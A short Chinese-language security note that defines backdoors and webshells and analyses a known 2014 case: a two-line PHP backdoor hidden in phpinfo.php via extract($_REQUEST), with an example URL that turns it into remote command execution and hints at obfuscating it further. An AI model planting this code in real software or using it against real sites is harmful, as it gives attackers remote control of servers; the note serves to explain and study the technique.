后门 Backdoor

术语解释

根据某词条解释：

Backdoor，电脑病毒木马，中文名称“后门”， 是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行可以对被感染的系统进行远程控制，而且用户无法通过正常的方法禁止其运行。

但实际使用时对于web也可以使用，比如webshell，就算是一种相当常见的Web应用后门。

Backdoor示例

PHP Backdoors: Hidden With Clever Use of Extract Function

这个是14年2月国外研究人员发表的， 算是经典案例。

在phpinfo.php中发现可疑代码如下：

    @extract ($_REQUEST); 
    @die ($ctime($atime));

知识点补充：

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。

该函数返回成功设置的变量数目。

die() 函数输出一条消息，并退出当前脚本。

$_REQUEST — HTTP Request 变量，默认情况下包含了 $_GET，$_POST 和 $_COOKIE 的数组。

利用和解释：

在浏览器访问：www.site.com/phpinfo.php?ctime=system&atime=ls -la

extract结合变量将 @die ($ctime($atime)); 转为 @die (system(“ls -la”)); ，这样就能实现远程命令执行RCE。

扩展：变量名替换；增加函数嵌套逻辑等等。

ref: PHP Backdoors: Hidden With Clever Use of Extract Function